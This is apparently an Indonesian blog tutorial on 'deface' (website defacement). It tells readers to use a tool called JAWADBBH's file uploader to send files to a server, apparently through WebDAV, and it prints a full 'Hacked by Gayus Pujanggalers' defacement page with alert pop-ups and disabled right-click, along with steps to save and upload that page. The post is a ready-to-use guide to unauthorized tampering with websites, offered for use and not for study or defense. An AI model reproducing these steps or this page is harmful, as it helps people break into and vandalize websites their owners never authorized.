mau belajar daface dengan mudah
KLIK sini bang >> JAWADBBH <<
terus Select the "File Uploader" to use pilih PHP
terus Upload a new file terus send it to the server
KLIK sini bang >> JAWADBBH <<
terus Select the "File Uploader" to use pilih PHP
terus Upload a new file terus send it to the server
langkah pertama
- klik JAWADBBH
- klik "File Uploader" pilih PHP
- upload a new File
- send it to the server
<html><head> <link rel="SHORTCUT ICON" href="http://i48.servimg.com/u/f48/16/08/07/74/indone10.gif"> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <title>+--++--++S++--++--+</title> <meta name="keywords" content="@RPG_root"> <script> //<![CDATA[ var message = new Array() message[0] = " Hacked"; message[1] = " by"; message[2] = "Indonesia Fighter Cyber"; var reps = 1 var speed = 100 var p=message.length; var T=""; var C=0; var mC=0; var s=0; var sT=null; if(reps<1)reps=1; function doTheThing(){ T=message[mC]; A();} function A(){ s++ if(s>9){s=1} if(s==1){document.title='+-++[--++'+T+'++--++--+'} if(s==2){document.title='--||--||-'+T+'-||--||--'} if(s==3){document.title='-++--++--'+T+'--++--++-'} if(s==4){document.title='||--||---'+T+'---||--||'} if(s==5){document.title='+--++--++'+T+'++--++--+'} if(s==6){document.title='--||--||-'+T+'-||--||--'} if(s==7){document.title='-++--++--'+T+'--++--++-'} if(s==8){document.title='||--||--['+T+']--||--||'} if(s==9){document.title='+--++--++'+T+'++--++--+'} if(C<(8*reps)){ sT=setTimeout("A()",speed); C++ }else{ C=0; s=0; mC++ if(mC>p-1)mC=0; sT=null; doTheThing();}} doTheThing(); function toggleLayer( whichLayer ) { var elem, vis; if( document.getElementById ) elem = document.getElementById( whichLayer ); else if( document.all ) elem = document.all[whichLayer]; else if( document.layers ) elem = document.layers[whichLayer]; vis = elem.style; if(vis.display==''&&elem.offsetWidth!=undefined&&elem.offsetHeight!=undefined) vis.display = (elem.offsetWidth!=0&&elem.offsetHeight!=0)?'block':'none'; vis.display = (vis.display==''||vis.display=='block')?'none':'block'; } </script> <script language="JavaScript"> alert ("Hacked By Gayus Pujanggalers") ; </script> <title>Hacked by Gayus Pujanggalers</title> <meta name="Author" content="http://www.google.com"> <meta name="description" content=" ҳ̸Ҳ̸ҳ Hacked by Gayus Pujanggalers ҳ̸Ҳ̸ҳ"> <meta name="keywords" content=" Hacked by Gayus Pujanggalers "> <meta content="Nishobdo pothik" name="author"> <meta name="owner" content="C4xuN"> <meta name="rating" content="general"> <meta name="classification" content="Internet Services"> <meta name="google rank" content="1"> <meta name="robots schedule" content="auto"> <meta name="distribution" content="global"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="imagetoolbar" content="no"> </head><body> <style type="text/css"> body { background: #000000; font-family: Courier New; color: White; text-align: center; } a { text-decoration:none; color: #1FFF1F; } </style> <marquee behavior="scroll" direction="left" scrollamount="100" scrolldelay="40" width="100%"> _____________________________________ </marquee> <marquee behavior="scroll" direction="left" scrollamount="100" scrolldelay="40" width="100%"> _____________________________________ </marquee> <marquee behavior="scroll" direction="right" scrollamount="100" scrolldelay="40" width="100%"> _____________________________________ </marquee> <marquee behavior="scroll" direction="right" scrollamount="100" scrolldelay="40" width="100%"> _____________________________________ </marquee> <script type="text/javascript">/*<![CDATA[*/ TypingText = function(element, interval, cursor, finishedCallback) { if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) { this.running = true; return; } this.element = element; this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; }); this.interval = (typeof interval == "undefined" ? 100 : interval); this.origText = this.element.innerHTML; this.unparsedOrigText = this.origText; this.cursor = (cursor ? cursor : ""); this.currentText = ""; this.currentChar = 0; this.element.typingText = this; if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++; TypingText.all.push(this); this.running = false; this.inTag = false; this.tagBuffer = ""; this.inHTMLEntity = false; this.HTMLEntityBuffer = ""; } TypingText.all = new Array(); TypingText.currentIndex = 0; TypingText.runAll = function() { for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run(); } TypingText.prototype.run = function() { if(this.running) return; if(typeof this.origText == "undefined") { setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); return; } if(this.currentText == "") this.element.innerHTML = ""; if(this.currentChar < this.origText.length) { if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) { this.tagBuffer = "<"; this.inTag = true; this.currentChar++; this.run(); return; } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) { this.tagBuffer += ">"; this.inTag = false; this.currentText += this.tagBuffer; this.currentChar++; this.run(); return; } else if(this.inTag) { this.tagBuffer += this.origText.charAt(this.currentChar); this.currentChar++; this.run(); return; } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) { this.HTMLEntityBuffer = "&"; this.inHTMLEntity = true; this.currentChar++; this.run(); return; } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) { this.HTMLEntityBuffer += ";"; this.inHTMLEntity = false; this.currentText += this.HTMLEntityBuffer; this.currentChar++; this.run(); return; } else if(this.inHTMLEntity) { this.HTMLEntityBuffer += this.origText.charAt(this.currentChar); this.currentChar++; this.run(); return; } else { this.currentText += this.origText.charAt(this.currentChar); } this.element.innerHTML = this.currentText; this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : ""); this.currentChar++; setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); } else { this.currentText = ""; this.currentChar = 0; this.running = false; this.finishedCallback(); } } /*]]>*/</script> <br> <br> <h2></h2> <div id="container"> <div id="content-container"> <div id="content"> <h2> <p class=""> </p> <center> <img src="http://imageshack.us/a/img198/7869/55820541358708871605620.jpg" alt="Nombre de mi imagen" width="440" height="300"> <marquee behavior="scroll" direction="left" scrollamount="100" scrolldelay="40" width="100%"> _____________________________________ </marquee> <marquee behavior="scroll" direction="left" scrollamount="100" scrolldelay="40" width="100%"> _____________________________________ </marquee> <p id="message" class="notes"> Hacked By Gayus Pujanggalers <br> <br> Not secure system bro !!! :D <br> I LOVE your weak <br> Let it flow !!!! ^_^ <br> Contact ---> Twitter @LeboyAndi <br> <br> <font color="maroon"> </font><br> _</p> <p class="notes"> </p> <script type="text/javascript">/*<![CDATA[*/ new TypingText(document.getElementById("message"), 90, function(i){ var ar = new Array("_", " ", "_", " "); return " " + ar[i.length % ar.length]; }); //Type out examples: TypingText.runAll(); /*]]>*/</script> </center></h2></div> <div id="aside"> <!--scripts--> <script type="text/javascript"> function meow() { alert(""); alert(""); alert(""); alert(""); } function box() { alert(""); alert(""); } window.onbeforeunload = function() { alert("your system is Hacked By Gayus Pujanggalers"); } </script> <script type="text/javascript"><!-- var message="Sorry, right-click has been disabled";function clickIE(){if(document.all){(message);return false;}} function clickNS(e){if(document.layers||(document.getElementById&&!document.all)){if(e.which==2||e.which==3){(message);return false;}}} if(document.layers) {document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;} else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;} document.oncontextmenu=new Function("return false")//--> </script> <script type="text/javascript">/*<![CDATA[*/ TypingText=function(element,interval,cursor,finishedCallback){if((typeof document.getElementById=="undefined")||(typeof element.innerHTML=="undefined")){this.running=true;return;} this.element=element;this.finishedCallback=(finishedCallback?finishedCallback:function(){return;});this.interval=(typeof interval=="undefined"?100:interval);this.origText=this.element.innerHTML;this.unparsedOrigText=this.origText;this.cursor=(cursor?cursor:"");this.currentText="";this.currentChar=0;this.element.typingText=this;if(this.element.id=="")this.element.id="typingtext"+TypingText.currentIndex++;TypingText.all.push(this);this.running=false;this.inTag=false;this.tagBuffer="";this.inHTMLEntity=false;this.HTMLEntityBuffer="";} TypingText.all=new Array();TypingText.currentIndex=0;TypingText.runAll=function(){for(var i=0;i<TypingText.all.length;i++)TypingText.all[i].run();} TypingText.prototype.run=function(){if(this.running)return;if(typeof this.origText=="undefined"){setTimeout("document.getElementById('"+this.element.id+"').typingText.run()",this.interval);return;} if(this.currentText=="")this.element.innerHTML="";if(this.currentChar<this.origText.length){if(this.origText.charAt(this.currentChar)=="<"&&!this.inTag){this.tagBuffer="<";this.inTag=true;this.currentChar++;this.run();return;}else if(this.origText.charAt(this.currentChar)==">"&&this.inTag){this.tagBuffer+=">";this.inTag=false;this.currentText+=this.tagBuffer;this.currentChar++;this.run();return;}else if(this.inTag){this.tagBuffer+=this.origText.charAt(this.currentChar);this.currentChar++;this.run();return;}else if(this.origText.charAt(this.currentChar)=="&"&&!this.inHTMLEntity){this.HTMLEntityBuffer="&";this.inHTMLEntity=true;this.currentChar++;this.run();return;}else if(this.origText.charAt(this.currentChar)==";"&&this.inHTMLEntity){this.HTMLEntityBuffer+=";";this.inHTMLEntity=false;this.currentText+=this.HTMLEntityBuffer;this.currentChar++;this.run();return;}else if(this.inHTMLEntity){this.HTMLEntityBuffer+=this.origText.charAt(this.currentChar);this.currentChar++;this.run();return;}else{this.currentText+=this.origText.charAt(this.currentChar);} this.element.innerHTML=this.currentText;this.element.innerHTML+=(this.currentChar<this.origText.length-1?(typeof this.cursor=="function"?this.cursor(this.currentText):this.cursor):"");this.currentChar++;setTimeout("document.getElementById('"+this.element.id+"').typingText.run()",this.interval);}else{this.currentText="";this.currentChar=0;this.running=false;this.finishedCallback();}}/*]]>*/</script> <marquee behavior="scroll" direction="right" scrollamount="100" scrolldelay="40" width="100%"> _____________________________________ </marquee> <marquee behavior="scroll" direction="right" scrollamount="100" scrolldelay="40" width="100%"> _____________________________________ </marquee> <marquee behavior="scroll" direction="left" scrollamount="30"" scrolldelay="60" width="60%"></marquee> <marquee behavior="scroll" direction="left" scrollamount="100" scrolldelay="40" width="200%"> _____________________________________ </marquee> <marquee behavior="scroll" direction="left" scrollamount="100" scrolldelay="40" width="200%"> _____________________________________ </marquee>
<center><object width="420" height="315"><param name="movie" value="http://www.youtube.com/v/FkfXXA0MbVc?hl=en_US&version=3"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/FkfXXA0MbVc?hl=en_US&version=3" type="application/x-shockwave-flash" width="420" height="315"></object></center></div></div></div></body></html>
Copy Scrip di atas
buka notepade
scrip yang sudah di copy di paste kan ke dalam notepadeterus Save As dengan nama terserah andacontoh : JawadBBH.htmlklo sudah di save as
klik telusuriklik send it to the serverakan muncul code di : Uploaded File URL
klo ga ngerti add my facebook
YANG MAU BELAJAR TENTANG WEBSITE/WEBDAV/
SEDOT BANG=====>>> JAWADBBH <<=======


Tidak ada komentar:
Posting Komentar